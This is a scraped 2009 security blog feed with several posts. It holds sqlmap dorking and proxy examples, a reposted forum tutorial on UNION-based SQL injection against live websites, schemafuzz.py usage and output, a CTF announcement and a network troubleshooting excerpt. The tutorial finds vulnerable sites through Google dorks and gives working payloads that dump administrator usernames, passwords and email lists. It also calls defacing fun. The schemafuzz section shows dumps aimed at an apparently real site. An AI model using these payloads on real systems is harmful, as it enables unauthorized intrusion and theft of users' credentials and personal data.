sqlmap will retrieve Google first 100 results for the Google dork expression with GET parameters asking you if you want to test and inject on each possible affected URL.<br /><br />Example of Google dorking with expression site:yourdomain.com ext:php:<br /><br /> $ <font color=lime> python sqlmap.py -g "site:yourdomain.com ext:php" -v 1 </font><br /><font color=aqua><br /> [hh:mm:38] [INFO] first request to Google to get the session cookie<br /> [hh:mm:40] [INFO] sqlmap got 65 results for your Google dork expression, 59 of them are <br /> testable hosts<br /> [hh:mm:41] [INFO] sqlmap got a total of 59 targets<br /> [hh:mm:40] [INFO] url 1:<br /> GET http://yourdomain.com/example1.php?foo=12, do you want to test this <br /> url? [y/N/q] n<br /> [hh:mm:43] [INFO] url 2:<br /> GET http://yourdomain.com/example2.php?bar=24, do you want to test this <br /> url? [y/N/q] n<br /> [hh:mm:42] [INFO] url 3:<br /> GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you <br /> want to test this url? [y/N/q] y<br /> [hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483<br /> [hh:mm:45] [INFO] testing if the url is stable, wait a few seconds<br /> [hh:mm:49] [INFO] url is stable<br /> [hh:mm:50] [INFO] testing if GET parameter 'today' is dynamic<br /> [hh:mm:51] [INFO] confirming that GET parameter 'today' is dynamic<br /> [hh:mm:53] [INFO] GET parameter 'today' is dynamic<br /> [hh:mm:54] [INFO] testing sql injection on GET parameter 'today'<br /> [hh:mm:56] [INFO] testing numeric/unescaped injection on GET parameter 'today'<br /> [hh:mm:57] [INFO] confirming numeric/unescaped injection on GET parameter 'today'<br /> [hh:mm:58] [INFO] GET parameter 'today' is numeric/unescaped injectable<br /> [...]<br /></font><br /><br /><h1><b>HTTP proxy</b></h1><br /><br />Option: --proxy<br /><br />It is possible to provide an anonymous HTTP proxy address to pass by the HTTP requests to the target URL. The syntax of HTTP proxy value is http://url:port.<br /><br />Example on a PostgreSQL 8.3.5 target:<br /><br /> $ <font color=lime>python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \<br /> --proxy "http://192.168.1.47:3128" </font><br /><font color=aqua><br /> [hh:mm:36] [WARNING] User-Agent parameter 'User-Agent' is not dynamic<br /> [hh:mm:36] [WARNING] GET parameter 'cat' is not dynamic<br /> [hh:mm:37] [WARNING] the back-end DMBS is not MySQL<br /> [hh:mm:37] [WARNING] the back-end DMBS is not Oracle<br /> back-end DBMS: PostgreSQL<br /></font><br />Instead of using a single anonymous HTTP proxy server to pass by, you can configure a Tor client together with Privoxy on your machine as explained on the Tor client guide then run sqlmap as follows:<br /><br /> $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \<br /> --proxy "http://192.168.1.47:8118"<br /><br />Note that 8118 is the default Privoxy port, adapt it to your settings.<br /><br /><a href="http://sqlmap.sourceforge.net/doc/README.html" target="_blank">http://sqlmap.sourceforge.net/doc/README.html</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-49392152926689530702009-08-01T03:13:00.000-07:002009-08-23T15:09:03.074-07:00Interview Questions for Security/Network/Unix guy<a href="http://www.techinterviews.com/security-interview-questions-for-network-admin" target="_blank">http://www.techinterviews.com/security-interview-questions-for-network-admin</a><br /><br /><a href="http://www.geekinterview.com/Interview-Questions/Networking/Networks-and-Security" target="_blank">http://www.geekinterview.com/Interview-Questions/Networking/Networks-and-Security</a><br /><br /><a href="http://danielmiessler.com/blog/10-questions-to-ask-during-an-information-security-interview" target="_blank">http://danielmiessler.com/blog/10-questions-to-ask-during-an-information-security-interview</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-88622593985777984122009-07-23T00:43:00.000-07:002009-07-23T00:51:57.149-07:00Gathering DNS information<a href="http://searchdns.netcraft.com/?position=limited&host=facebook.com" target="_blank"><font color=royalblue>http://searchdns.netcraft.com/?position=limited&host=<font color=red>facebook.com</font></font></a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-83763719454497405642009-07-14T22:38:00.000-07:002010-09-28T03:28:40.620-07:00rCom's SQLi Tutorial { reMix }Contents At A Glance:<br />
<br />
<strong>1. Introduction(Kinda Pointless)</strong><br />
<strong>2. Finding Vulnerable Sites.</strong><br />
<strong>3. Getting Number of Columns.</strong><br />
<strong>4. Getting MySQL Version.</strong><br />
<strong>5. Getting Database Names.</strong><br />
<strong>6. Getting Database User.</strong><br />
<strong>7. Getting Table Names.</strong><br />
<strong>8. Getting Column Names.</strong><br />
<strong>9. LIMIT, What is it and why do I need to know it?</strong><br />
<strong>10. End Notes</strong><br />
<br />
<strong><span class="Apple-style-span" style="color: orange;"><span class="Apple-style-span" style="font-size: x-large;">1. Introduction(Kinda Pointless)</span></span></strong><br />
First, if you find that I have written something that is wrong, please address it and I will fix it. There is one simple reason why I am writing this paper, mainly because there are so many simple SQL Injection questions that flood this board everyday and people just simple say things like “Learn to use the search function.â€, “Google is your friendâ€, or some other just completely non-helpful remarks. If you aren't going to help someone why reply at all? Just go on to another thread. That doesn't even bring up the number of private messages that I receive daily with questions related to SQL Injection, on a slow day I receive 1-2 private messages, on a normal day I will get up to 10 with questions about SQL, or even “What is your MSN/Yahoo/AIM/E-Mail, I need help.†Most of the time I do try to help as much as I can, but it does get old too. Well, enough ranting here goes.<br />
<br />
<strong><span class="Apple-style-span" style="color: orange;"><span class="Apple-style-span" style="font-size: x-large;">2. Finding Vulnerable Sites</span></span></strong><br />
First you need to know what makes a site vulnerable to SQL Injection before you can find and vulnerable sites. <br />
<br />
The most common reason that a site is vulnerable to SQL Injection attacks in because the owner/coder didn't use the built in MySQL feature 'mysql_real_escape_string()'. The purpose of this function is to sanitize or remove special characters from an SQL query. The most common side-effect is the simple Username/Password exploit ' or 1='1. Most website administrators today use this function along with stripslashes() or addslashes() to further sanitize the data.<br />
<br />
Well since I gave you a very basic reason for why certain sites are vulnerable we will move onto finding some vulnerable sites to play with.<br />
<br />
When talking about finding sites to inject you will hear the term “dork†a lot, what this refers to is a google search term targeted at finding vulnerable websites. A “google dork†uses the built in google functions inurl:, or allinurl: to search for websites that have certain strings in their URL or website address, an example of a google dork is: inurl:index.php?id=1, entering this string into the google search engine would return all of the sites in google's cache with the string index.php?id=1 in their URL, Ex: http://www.example.com/index.php?id=1<br />
<br />
Here are some lists of “dorks†to use:<br />
http://www.hackforums.net/showthread.php?tid=76925<br />
http://www.hackforums.net/showthread.php?tid=71313<br />
http://go-blog.web.id/?p=3<br />
http://sql-injection-tools.blogspot.com/...hafiq.html<br />
<br />
Now that we know what a google dork is we can start finding vulnerable sites. To be vulnerable the site has to have a GET parameter in the URL: index.php?id=1, id=1 being the GET parameter 'gets' the 1 'id' from the SQL database(Understand? Good.) <br />
<br />
So you are going to go to http://www.google.com,http://www.blackle.com, or http://www.dogpile.com and search for your selected dork. When you get your list you can start checking for vulnerabilities. To do this the most common way is to add a back-tick after one of the integers in the URL<br />
Example: http://www.example.com/index.php?id=1'<br />
<br />
Now there are many ways for a site to show you that it is vulnerable the most common are errors:<br />
<span style="background-color: #666666;">You have an error in your SQL Syntax</span><br />
<span style="background-color: #666666;">Warning: mysql_fetch_array():</span><br />
<span style="background-color: #666666;">Warning: mysql_fetch_assoc():</span><br />
<span style="background-color: #666666;">Warning: mysql_numrows():</span><br />
<span style="background-color: #666666;">Warning: mysql_num_rows():</span><br />
<span style="background-color: #666666;">Warning: mysql_result():</span><br />
<span style="background-color: #666666;">Warning: mysql_preg_match():</span><br />
<br />
If you receive any of these errors when you enter the ' after the number then chances are the site is vulnerable to SQL Injection attacks to some extent, but that isn't the only way to see if a site is vulnerable, the biggest overlooked error is when a main part of the site just simply disappears, such as a news article or a body of text on the main site. If this happens then it is likely that the site is vulnerable also. <br />
<br />
<strong><span class="Apple-style-span" style="color: orange;"><span class="Apple-style-span" style="font-size: x-large;">3. Getting Number of Columns</span></span></strong><br />
After you find your vulnerable site the first step you need to take is to find the number of columns in the table that is in use. There are a couple of ways that people do this, personally I use the <span style="color: orange;">ORDER BY</span> statement, there is also<span style="color: orange;"> GROUP BY</span> which accomplishes the same thing, but it's just habit. A lot of people use the string <span style="color: orange;">AND 1=0 </span>before their queries, most of the time this is just a waste of time to type this out, the only time you need this is if you try <span style="color: orange;">ORDER BY 300--</span> and you don't receive an error, then you would add the and 1=0 to your query. <br />
<br />
To find number of columns you start with ORDER BY 1, if it doesn't error then you are good to go, sometimes you will get a syntax error when doing ORDER BY 1 that's why it is important to start there, if you get the syntax error your best bet is to move on to another site. If you don't get an error I always go to ORDER BY 300 to see if I will get an error there, sometimes you could go on for years and never get an error, there can't be 300 columns in the database so you should always get an error. After getting the error on 300 it is up to you how you want to find the number of columns, personally I jump around out of habit I usually do something like this: <br />
Code:<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=1 <span style="color: orange;">ORDER BY 1--</span></span><br />
no error<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=1 <span style="color: orange;">ORDER BY 300--</span></span><br />
error<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=1 <span style="color: orange;">ORDER BY 10--</span></span><br />
error<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=1 <span style="color: orange;">ORDER BY 5--</span></span><br />
no error<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=1 <span style="color: orange;">ORDER BY 6--</span></span><br />
error<br />
After this you know that your website has 5 columns because it errors on everything above ORDER BY 5, and doesn't error on anything below ORDER BY 5.<br />
<br />
Note on comments: Comments are not always necessary when injecting a website, although sometimes they are, by comments I am referring to the – at the end of the URL.<br />
Possible comments to use are --, /*, /**/, or simply nothing at the end.<br />
<br />
<strong><span class="Apple-style-span" style="color: orange;"><span class="Apple-style-span" style="font-size: x-large;">4. Getting MySQL Version</span></span></strong><br />
Now that we have the number of columns you are going to want to get the version of the database you are working on, this is an important step, because any version lower than 5 you will have to guess table names and column names. I don't recommend working on a database lower than version 5 for beginners, you should get aquanted with SQL Injection first. Before we can get the version you have to find a visible column number. This is where the Injection part really starts. To do this you will use a SELECT statement and the UNION statement. Most people don't understand that these are two completely different SQL statements, the reason you use UNION SELECT is because you are already SELECTing from the database when you are simply visiting the site. <br />
For example: <span style="background-color: #444444;">http://www.example.com<span style="color: #9fc5e8;">/index.php?id=1</span></span><br />
What this URL is telling the database is <span style="background-color: #20124d;">SELECT * FROM <span style="color: magenta;">'tablenamehere'</span> WHERE id=<span style="color: magenta;">'1'</span>;</span><br />
<br />
Now when we add out UNION into that URL we are adding two SQL statements together since our example website has 5 columns this is what our query would look like:<br />
<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=1<span class="Apple-style-span" style="color: yellow;">+UNION+SELECT+1,2,3,4,5--</span></span><br />
<br />
The website should return normal after doing this, if it doesn't and it tells you something like “Forbidden†or some other error, then the website doesn't support union statements and you need to move on. If it doesn't error then add a negative sign after the equals sign like this:<br />
<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=<span class="Apple-style-span" style="color: yellow;">-</span>1+<span class="Apple-style-span" style="color: yellow;">UNION+SELECT+1,2,3,4,5--</span></span><br />
<br />
There is a reason for this people, I've been asked many times why you do this, the reason is when you send this query to the database you are sending something like: <br />
<span style="background-color: #20124d;">SELECT * FROM <span style="color: magenta;">'tablenamehere' </span>WHERE id=<span style="color: magenta;">'-1'</span> AND SELECT <span style="color: magenta;">1,2,3,4,5 </span></span><br />
<br />
There isn't a -1 in the id column so the database will return a blank section of the page, but since we have our other SELECT statement in there it will return numbers back in the data's place. Those are our visible columns. For our example we'll say we got back the numbers 2 and 3 so these are the numbers that we can retrieve data from. To get our database version there are two ways either <span style="color: orange;">@@version</span> or <span style="color: orange;">version()</span>. To use them do this:<br />
<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1+UNION+SELECT+1,<span class="Apple-style-span" style="color: yellow;">@@version</span>,3,4,5--</span><br />
or<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1+UNION+SELECT+1,<span class="Apple-style-span" style="color: yellow;">concat(version())</span>,3,4,5--</span><br />
<br />
If you get an error like “Illegal mix of coallations when using @@version you simple have to convert it to latin from UTF8 like so:<br />
<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1+UNION+SELECT+1,<span class="Apple-style-span" style="color: yellow;">convert(@@version using latin1)</span>,3,4,5--</span><br />
<br />
NOTE: Notice that we completely replace the number 2 with our query, something like union select 1,concat(version()),2,3,4,5-- will not work.<br />
<br />
Well if it worked you know now the version of the MySQL database in use you will see something like 5.0.13-log, or 4.0.0.1-delta, there are countless versions and types but all we need to focus on is the first number if it 5 then we are good to go, if it is 4 then if you are new you should move on.<br />
<br />
<strong><span class="Apple-style-span" style="color: orange;"><span class="Apple-style-span" style="font-size: x-large;">5. Getting Database Names</span></span></strong><br />
I haven't seen this covered on any papers on SQL Injection so I will include it because it is an important part of SQL Injection. For novice SQL Injectors ever started to inject a website then find no useful data such as. usernames/passwords? Most likely because the current database in use for the site only holds data like news articles and the like. This is where getting the different database names is important. In version of MySQL higher than 5 there will always be a database named 'information_schema' and most of the time a database named 'test', neither of these hold data that you will need to know, but yet the information_schema database is the reason that injection v5+ databases is so easy. <br />
<br />
To get list of databases do this:<br />
<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1+UNION+SELECT+1,<span style="color: orange;">group_concat(schema_name)</span>,3,4,5+ FROM+<span style="color: orange;">information_schema.schemata--</span></span><br />
Now where you saw the database version pop up earlier you will see the names of all of the different databases we will say for our example we got back something like this:<br />
<span style="background-color: #20124d; color: red;">information_schema,exampledb,exampledb2,test</span><br />
<br />
If you want to know what the database in use right now do this:<br />
Code:<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 <strong>UNION SELECT</strong> 1,<span style="color: orange;">concat(database())</span>,3,4,5--</span><br />
We'll say we got back 'exampledb'. <br />
<br />
From now on it is a good idea to have a text editor open like notepad/gEdit to save this information for later use. I always have notepad open when I am injecting a site, with a template like this:<br />
<br />
<span style="background-color: #666666;">Databases:</span><br />
<span style="background-color: #666666;"><br />
</span><br />
<span style="background-color: #666666;">Tables:</span><br />
<span style="background-color: #666666;"><br />
</span><br />
<span style="background-color: #666666;">Columns:</span><br />
<br />
So that I can quickly copy and paste in. In my opinion this is a good habit to get into.<br />
<br />
<strong><span class="Apple-style-span" style="color: orange;"><span class="Apple-style-span" style="font-size: x-large;">6. Getting Database User</span></span></strong><br />
Not really necessary but good to know use user():<br />
Code:<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 UNION SELECT 1,<span style="color: orange;">concat(user())</span>,3,4,5--</span><br />
<br />
<strong><span class="Apple-style-span" style="color: orange;"><span class="Apple-style-span" style="font-size: x-large;">7. Getting Table Names</span></span></strong><br />
I'm going to go a little more in-depth than most tutorials you'll see on the internet here because they aren't very thorough, most will just tell you how to get the tables of the current database but I am going to show you how to get table names from selected databases.<br />
<br />
<strong>6. To get table names of current database:</strong><br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 UNION SELECT 1,<span style="color: orange;">group_concat(table_name)</span>,3,4,5 from </span><span style="background-color: #444444;"><span style="color: orange;">information_schema.tables</span> WHERE <span style="color: orange;">table_schema=database()--</span></span><br />
<br />
You will see a list of table names come out, for our example we will say we got:<br />
<span style="background-color: #444444; color: red;">news, images, ads, links</span><br />
<br />
Wow that looks useful huh? That is information we can get from just looking at the website, so now it's time to get tables from our other database we found earlier 'exampledb2' This is where your best friend the hex converter will come in handy. To get tables from selected databases you have to hex the name. <br />
So we convert exampledb2 to 6578616d706c65646232. Always rember to add the 0x in front of the hexed name to tell the database that it is hex encoded and it need to decode it to get the right name. So our database name ends up being 0x6578616d706c65646232. <br />
<br />
<strong>Online text-to-hex converters:</strong><br />
http://www.motobit.com/util/binary-file-...string.asp<br />
http://www.string-functions.com/string-hex.aspx<br />
http://home2.paulschou.net/tools/xlate/<br />
<br />
Now for the query:<br />
<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 UNION SELECT 1,<span style="color: orange;">group_concat(table_name)</span>,3,4,5 FROM <span style="color: orange;">information_schema.tables</span> WHERE <span style="color: orange;">table_schema=<span style="color: red;">0x6578616d706c65646232</span>--</span></span><br />
Notice we change<span style="color: black;"> </span><span style="color: red;">'database()'</span> to our hexed database name <span style="color: red;">'0x6578616d706c65646232'</span> <br />
<br />
For our example we'll say we got back:<br />
<span style="background-color: #666666; color: red;">newsletter, members, administrators</span><br />
<br />
That's the good stuff, normally you wouldn't have found this information and just moved onto another site. <br />
<br />
<strong><span class="Apple-style-span" style="color: orange;"><span class="Apple-style-span" style="font-size: x-large;">8. Getting Column Names</span></span></strong><br />
This is exactly like getting table names you just change <span style="color: orange;">table_name</span> to <span style="color: orange;">column_name</span> and <span style="color: orange;">information_schema.tables</span> to <span style="color: orange;">information_schema.columns</span>:<br />
<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 UNION SELECT 1,<span style="color: orange;">group_concat(column_name)</span>,3,4,5 FROM <span style="color: orange;">information_schema.columns</span> WHERE <span style="color: orange;">table_schema=database()--</span></span><br />
<br />
That's gonna give you every column name on the database but you don't want the columns for 'exampledb' remember because there wasn't any useful info in there, you want just the column names from 'exampledb2' because there were member info and admin info in that database. So now you open you Text-to-hex again and hex your database again so 'exampledb2' becomes ' 0x6578616d706c65646232'<br />
<br />
Code:<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 UNION SELECT 1,<span style="color: orange;">group_concat(column_name)</span>,3,4,5 from <span style="color: orange;">information_schema.columns</span> WHERE <span style="color: orange;">table_schema= 0x6578616d706c65646232--</span></span><br />
That will only return the column names from that selected database. We'll say we got back:<br />
<span style="background-color: #666666; color: red;">email, username, password, first_name, last_name</span><br />
<br />
If you remember the table names from exampledb2, which you should because you always paste into notepad right?, you can get the administrators username, password, email address, and full name. <br />
To get this you would do:<br />
Code:<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 union select 1,<span style="color: orange;">group_concat(<span style="color: red;">username</span>,0x3a,<span style="color: red;">password</span>,0x3a,<span style="color: red;">email</span>,0x3a,<span style="color: red;">first_name</span>,0x3a,<span style="color: red;">last_name</span>) </span>,3,4,5 FROM <span style="color: orange;"><span style="color: red;">exampledb2.administrators</span>--</span></span><br />
<br />
0x3a being the hex value for a colon ':' so that you can easily seperate the information. Sometimes this wont work though, sometimes you have to hex the databasename.tablename (not alot but sometimes) so in that case it would be:<br />
Code:<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 union select 1,<span style="color: orange;">group_concat(<span style="color: red;">username</span>,0x3a,<span style="color: red;">password</span>)</span>,3,4,5 from <span style="color: red;">0x6578616d706c656462322e61646d696e6973747261746f7273</span>--</span><br />
Which will then give you what you're looking for.<br />
<br />
<strong><span class="Apple-style-span" style="font-size: x-large;"><span class="Apple-style-span" style="color: orange;">9. LIMIT What is it and why do I need to know it?</span></span></strong><br />
Ever found a database that is full of users/emails/anything else that you want but can't get it all because the website just wont display them all at one go? Well, this is where you need the LIMIT statement. <br />
<br />
For our example we will say we want the emails from the exampledb2.newsletter table, the only column in that table is 'email', probably never be that easy but hey this is an example right? There are 500 emails in this database and when we group_concat(email) from the database we only get back 20 results and 1 half cut-off like random.douchebag@gma so how do we get the rest of the 480 emails? This is where your perseverance will come into play, if you want it that bad you would use the LIMIT statement to get them since we already got the first 20 results we'll start at 21 to get the full email address that is cut off:<br />
<br />
Code:<br />
<span style="background-color: #444444;">http://www.example.com/index.php?id=-1 union select 1,concat(email),3,4,5 from exampledb2.newsletter limit 21,9999999--</span><br />
<br />
Note when using limit: You can't use group_concat() it will error, drop the group and just use concat().<br />
<br />
The 999999 can be any number higher than the row count in the database I just use that because it is easy. You would do this increasing your number by 1 until you get an error or just a blank area where the email addresses have been popping up. Ex: limit 22,9999999--,limit 23,9999999--,limit 24,9999999--<br />
Yes, it will take a long time to do this, there are tools used to dump databases though, most common used is SQLI Helper, thought this tool is flawed too because it won't increase the last number when limiting if needed. <br />
<br />
<strong>10. End Notes</strong><br />
Well, that's it. I do hope that I helped at least a few of you. I know it was a long read for those of you that actually went through it all, but I think at least half of the people who read this will learn something new. On another note SQL Injection can be fun to do, defacing websites even more fun sometimes, but you need to know that it is illegal. Here are some things to keep in mind.<br />
[qoute]<br />
Hacking is covered under law Title 18: Crimes and Criminal Procedure: Part 1: Crimes: Chapter 47: Fraud and False Statements: Section 1030: Fraud and related activity in connection with computers. The federal punishment for hacking into computers ranges from a fine or imprisonment for no more than one year to a fine and imprisonment for no more than twenty years. This wide range of punishment depends upon the seriousness of the criminal activity and what damage the hacker has done. <br />
[/qoute]<br />
<br />
The Ten Commandments of Computer Ethics by the Computer Ethics Institute:<br />
1. Thou shalt not use a computer to harm other people.<br />
2. Thou shalt not interfere with other people's computer work.<br />
3. Thou shalt not snoop around in other people's computer files.<br />
4. Thou shalt not use a computer to steal.<br />
5. Thou shalt not use a computer to bear false witness.<br />
6. Thou shalt not copy or use proprietary software for which you have not paid.<br />
7. Thou shalt not use other people's computer resources without authorization or proper compensation.<br />
8. Thou shalt not appropriate other people's intellectual output.<br />
9. Thou shalt think about the social consequences of the program you are writing or the system you are designing.<br />
10. Thou shalt always use a computer in ways that insure consideration and respect for your fellow humans.<br />
<br />
If I helped, post some feedback, if I didn't PM me with your question and if it warrants an answer I will reply and add that into the tutorial. <br />
<br />
Don't forget to RATE my thread. 5 Stars would be nice.<br />
Last minute edition:<br />
Difinitive SQL E-Book Collection<br />
Contents:<br />
The Visibooks Guide to MySQL Basics<br />
Sybex - Mastering MySQL 4<br />
Sams - Teach Yourself Mysql in 10 Minutes<br />
Sams - MySQL Database Design and Tuning<br />
Sams - MySQL Tutorial<br />
Sams - MySQL Phrasebook - Essential Code and Commands<br />
Sams - MySQL Crash Course<br />
Sams - MySQL Certification Study Guide<br />
Sams - MySQL 2nd Edtion<br />
Peachpit Press - Visual Quickstart Guide -MySQL<br />
O'Reilly - MySQL Pocket Refernce<br />
O'Reilly - MySQL in a Nutshell<br />
O'Reilly - MySQL Cookbook<br />
O'Reilly - MySQL and mSQL<br />
O'Reilly - Managing and Using MySQL<br />
O'Reilly - High Performance MySQL<br />
MySQL Press - MySQL Administrator's Guide and Language Reference<br />
McGraw Hill - MySQL Essential Skills<br />
<br />
Download Link<br />
<br />
Code:<br />
#!/usr/bin/laden -w<br />
use Weapons::Of qw(Mass Destruction);<br />
if ( $home eq "Cave M_of_Nowhere") {<br />
print "I HAZ DE URANIUM\n";<br />
}<br />
<br />
<a href="http://www.hackforums.net/showthread.php?tid=94738" target="_blank">http://www.hackforums.net/showthread.php?tid=94738</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-1058177582782248482009-06-02T20:14:00.000-07:002009-06-02T20:17:26.323-07:00LAMPSecurity.org Capture the Flag ExerciseHello,<br /><br />I'm happy to announce that the second installment (cryptically called<br />CTF5) of LAMPSecurity.org's capture the flag series of exercises is now<br />available. This edition is novel in that it includes a 0-day exploit<br />that can be used (indirectly) to gain root. This is a training exercise<br />released in support of the educational mission of LAMPSecurity.org. The<br />exercise is modeled after many of the exercises that are presented in<br />expensive commercial training courses, except it's free, of course.<br />Unlike tools like OWASP's WebGoat, LAMPSecurity.org's capture the flag<br />exercise consists of a full, vulnerable, virtual machine (VMWare's free<br />Player is required). This allows users to explore vulnerabilities at<br />every level of the LAMP stack. The first exercise includes an "attack"<br />VM as well, with tools pre-installed (where possible). It also includes<br />over 60 pages of step-by-step documentation so no prior experience is<br />necessary (although the documentation only outlines one of several<br />routes to root compromise). The exercise is designed to educate system<br />administrators and developers on some common dangers and<br />mis-configurations facing Linux,Apache,MySQL, PHP (LAMP) applications.<br />Further details, including the documentation, are available at<br /><a href="http://lampsecurity.org/capture-the-flag-5" target="_blank">http://lampsecurity.org/capture-the-flag-5</a>. The vulnerable virtual<br />machine and attack image are available from SourceForge at<br /><a href="https://sourceforge.net/projects/lampsecurity/" target="_blank">https://sourceforge.net/projects/lampsecurity/</a>. Constructive feedback is<br />of course welcome. Thank you and enjoy.<br /><br />- -- <br />Justin C. Klein Keane<br />http://www.MadIrish.net<br />http://www.LAMPSecurity.orgUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-69250240629956711882009-05-27T13:12:00.000-07:002009-08-23T13:30:28.692-07:00schemafuzz.py by rsauron<font color=royalblue>schemafuzz.py -h</font><br />Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com<br /> Modes:<br /> Define: --dbs Shows all databases user has access too. MySQL v5+<br /> Define: --schema Enumerate Information_schema Database. MySQL v5+<br /> Define: --full Enumerates all databases information_schema table MySQL v5+<br /> Define: --dump Extract information from a Database, Table and Column. MySQL v4+<br /> Define: --fuzz Fuzz Tables and Columns. MySQL v4+<br /> Define: --findcol Finds Columns length of a SQLi MySQL v4+<br /> Define: --info Gets MySQL server configuration only. MySQL v4+<br /><br /> Required:<br /> Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"<br /><br /> Mode dump and schema options:<br /> Define: -D "database_name"<br /> Define: -T "table_name"<br /> Define: -C "column_name,column_name..."<br /><br /> Optional:<br /> Define: -p "127.0.0.1:80 or proxy.txt"<br /> Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt<br /> Define: -r row number to start at<br /> Define: -v Verbosity off option. Will not display row #'s in dump mode.<br /><br /> Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"<br /> Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"<br /> Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200<br /> Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D joomla -T jos_users -C username,password<br /> Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt<br /> Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"<br /><br /><br /><font color=royalblue>schemafuzz.py -u http://www.ayamitiklembu/news.php?id=1 <font color=yellow>--findcol </font></font><br /><br />|---------------------------------------------------------------|<br />| rsauron[@]gmail[dot]com v5.0 |<br />| 6/2008 schemafuzz.py |<br />| -MySQL v5+ Information_schema Database Enumeration |<br />| -MySQL v4+ Data Extractor |<br />| -MySQL v4+ Table & Column Fuzzer |<br />| Usage: schemafuzz.py [options] |<br />| -h help darkc0de.com |<br />|---------------------------------------------------------------|<br /><br />[+] URL: http://www.ayamitiklembu/news.php?id=1--<br />[+] Evasion Used: "+" "--"<br />[+] 23:35:53<br />[-] Proxy Not Given<br />[+] Attempting To find the number of columns...<br />[+] Testing: 0,1,2,3,<br />[+] <font color=orange>Column Length is: 4<br />[+] Found null column at column #: 1<br />[+] SQLi URL: http://www.ayamitiklembu/news...+0,1,2,3--<br />[+] darkc0de URL: http://www.ayamitiklembu/news...rkc0de,2,3</font><br />[-] Done!<br /><br /><font color=royalblue> schemafuzz.py -u http://www.ayamitiklembu/news...rkc0de,2,3 <font color=yellow>--fuzz </font></font><br /><br />|---------------------------------------------------------------|<br />| rsauron[@]gmail[dot]com v5.0 |<br />| 6/2008 schemafuzz.py |<br />| -MySQL v5+ Information_schema Database Enumeration |<br />| -MySQL v4+ Data Extractor |<br />| -MySQL v4+ Table & Column Fuzzer |<br />| Usage: schemafuzz.py [options] |<br />| -h help darkc0de.com |<br />|---------------------------------------------------------------|<br /><br />[+] URL: http://www.ayamitiklembu/news...c0de,2,3--<br />[+] Evasion Used: "+" "--"<br />[+] 23:43:22<br />[-] Proxy Not Given<br />[+] Gathering MySQL Server Configuration...<font color=orange><br />Database: web27-gc<br />User: web27-gc@79.170.40.171<br />Version: 5.0.77-community<br />[+] Number of tables names to be fuzzed: 338<br />[+] Number of column names to be fuzzed: 249</font><br />[+] Searching for tables and columns...<br /><br /><b>Reference: </b><br /><a href="http://www.hackforums.net/showthread.php?tid=79972" target="_blank">http://www.hackforums.net/showthread.php?tid=79972</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-1951245939883985382009-05-25T06:43:00.001-07:002009-05-25T06:44:49.857-07:00Troubleshooting Connectivity Problems on Windows NetworksThis article series will explain various troubleshooting techniques that you can use when machines on a Windows network have difficulty communicating with each other.<br /><br />If you would like to be notified when Brien M. Posey releases the next part of this article series please sign up to the WindowsNetworking.com Real time article update newsletter.<br /><br />Today’s network hardware and software is more reliable than ever but even so, things do occasionally go wrong. In this article series, I am going to discuss some troubleshooting techniques that you can use when a host on your Windows network has trouble communicating with other network hosts. For the sake of those with less experience in working with the TCP/IP protocol, I’m going to start with the basics, and then work toward the more advanced techniques.<br /><br /><span style="font-weight:bold;">Verify Network Connectivity</span><br /><br />When one host has trouble communicating with another, the first thing that you must do is to gather some information about the problem. More specifically, you need to document the host’s configuration, find out if the host is having trouble communicating with any other machines on the network, and find out if the problem effects any other hosts.<br /><br />For example, suppose that a workstation is having trouble communicating with a particular server. That in itself doesn’t really give you a lot to go on. However, if you were to dig a little bit deeper into the problem and found out that the workstation couldn’t communicate with any of the network servers, then you would know to check for a disconnected network cable, a bad switch port, or maybe a network configuration problem.<br /><br />Likewise, if the workstation were able to communicate with some of the network servers, but not all of them, that too would give you a hint as to where to look for the problem. In that type of situation, you would probably want to check to see what the servers that could not be contacted had in common. Are they all on a common subnet? If so, then a routing problem is probably to blame.<br /><br />If multiple workstations are having trouble communicating with a specific server, then the problem probably isn’t related to the workstations unless those workstations were recently reconfigured. More than likely, it is the server itself that is malfunctioning.<br /><br />The point is that by starting out with 